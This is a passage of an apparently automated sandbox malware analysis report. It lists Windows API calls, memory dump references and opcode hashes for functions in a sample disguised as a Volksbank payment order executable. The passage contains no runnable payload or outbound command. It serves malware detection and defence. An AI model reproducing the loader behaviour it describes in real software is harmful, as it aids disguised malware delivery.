                                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                                                          • Opcode ID: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
                                                                                                                                                                                                                                          • Instruction ID: 2a828f8333626ea4f8ae47897e76cf54d119540c9549312051f7543085d76b41
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9101D132624210ABE7095B789D04B6A3698E751315F10C63BB851F66F1DA7C8C429B4D
                                                                                                                                                                                                                                          Function 00406639 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,?,?,004033C2,0000000A), ref: 0040664B
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406666
                                                                                                                                                                                                                                            • Part of subcall function 004065C9: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065E0
                                                                                                                                                                                                                                            • Part of subcall function 004065C9: wsprintfW.USER32 ref: 0040661B
                                                                                                                                                                                                                                            • Part of subcall function 004065C9: LoadLibraryExW.KERNEL32(?,00000000,?), ref: 0040662F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2547128583-0
                                                                                                                                                                                                                                          • Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                                                                                                                                                                                                          • Instruction ID: 7f6190fd0785004a6ee8fc72a27bac991e5bdadb2fb285410322192917ba6648
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AFE02C322042016AC2009A30AE40C3B33A89A88310303883FFA02F2081EB398C31AAAD
                                                                                                                                                                                                                                          Function 00405D51 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00405D55
                                                                                                                                                                                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,?,0000000A), ref: 00405D77
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 415043291-0
                                                                                                                                                                                                                                          • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                                                                                                                                                          • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                                                                                                                                                                                          Function 0040580F Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00403343,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76943420,0040359C,?,00000006,?,0000000A), ref: 00405815
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000006,?,0000000A), ref: 00405823
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1375471231-0
                                                                                                                                                                                                                                          • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                                                                                                                                                                          • Instruction ID: 364d0df367319b35fd7f444a265edab083d6b2b9b53b3b0e5bc7a719fbea1b4c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29C08C312105019AC7002F20EF08B173E50AB20380F058839E546E00E0CE348064D96D
                                                                                                                                                                                                                                          Function 00405DD4 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,?,?,00000000,?,?,00403305,00000000,00000000,0040314C,?,?,00000000,00000000,00000000), ref: 00405DE8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                                                                          • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                                                                                                          • Instruction ID: b9e836fab2427aaa168680a15f0f0ce7fefe47de654f12bfd99ea101fd6ea48b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7DE0EC3222425EABDF509E559C04EEB7B6DEF05360F048837FD15E7160D631E921ABA8
                                                                                                                                                                                                                                          Function 00405E03 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,?,?,00000000,?,?,004032BB,000000FF,0078B6D8,?,0078B6D8,?,?,?,00000000), ref: 00405E17
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                                                                          • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                                                                                                          • Instruction ID: c8204e3b8f5822b3fc4a752f4075b10d4d5d267c9e9767057f3313d1a75d1f26
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38E0E632510559ABDF116F55DC00AEB775CFB05360F004436FD55E7150D671E9219BE4
                                                                                                                                                                                                                                          Function 100027C2 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(1000405C,?,?,1000404C), ref: 100027E0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2958030354.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2957996805.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2958065115.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2958090906.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                                                          • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                                                                                                                                          • Instruction ID: 43a77b614ff4017466e57d7f63f0e44ab05d53355a3bca00642047650885b550
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C5F0A5F15057A0DEF350DF688C847063BE4E3583C4B03852AE368F6269EB344454DF19
                                                                                                                                                                                                                                          Function 004060CC Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,007A0F00,?,?,0040615A,007A0F00,00000000,?,?,Call,?), ref: 004060F0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Open
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 71445658-0
                                                                                                                                                                                                                                          • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                                                                                                          • Instruction ID: ced63528db1e32a5bcf3a8a8acf2bd7baad3650648e26365f6afbd74657f9209
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BED0123208020DBBDF219F909D01FAB375DAB04354F018436FE06E4190DB76D570AB14
                                                                                                                                                                                                                                          Function 00404240 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404252
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                                                          • Opcode ID: cb0b7ebd38eb4799b8f4196fcc58e5a20f32a56ef1c2a101366cf6dcdfe2cd36
                                                                                                                                                                                                                                          • Instruction ID: 05de0a4d5a0d3ad16659c86bea74b86f68b6b4ad9b47f793b7e3caf381fa8301
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb0b7ebd38eb4799b8f4196fcc58e5a20f32a56ef1c2a101366cf6dcdfe2cd36
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10C09BB17843017BDE109B509D49F0777585BE0741F15857D7350F50E0C674E450D61D
                                                                                                                                                                                                                                          Function 00403308 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,?,0000000A), ref: 00403316
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 973152223-0
